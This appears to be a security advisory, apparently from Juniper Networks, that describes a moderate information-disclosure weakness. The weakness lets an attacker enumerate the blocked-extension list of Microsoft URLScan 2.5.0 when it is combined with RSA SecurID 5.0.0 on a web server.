Title: Microsoft URLScan / RSA Security SecurID Configuration Enumeration Weakness
Severity: MODERATE
Description:
Microsoft URLScan is an Internet Server API (ISAPI) filter that can be configured to block a variety of HTTP methods, file extension access, and other queries.
SecurID, a two-factor authentication mechanism developed by RSA Security, can also be used to prevent unauthorized access to a website.
A weakness has been discovered in Microsoft URLScan and RSA Security SecurID when used in conjunction on a web server. The problem is said to occur due to the order in which the products are placed within the global ISAPI filter list.
When the vulnerable configuration is in place, an attacker may be capable of enumerating the Microsoft URLScan extension filtering list, by making repeated requests to files with differing extensions. This is due to the web server incorrectly returning a page, containing a hidden form field that includes a 'referrer' NAME, and VALUE containing 'Rejected-By-UrlScan'. It should be noted that if the default configuration has been changed, the rejection string may differ.
The enumeration of this type of information could potentially aid an attacker when launching further attacks against the target web server.
Affected Products:
- Microsoft URLScan 2.5.0
- RSA Security SecurID 5.0.0
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
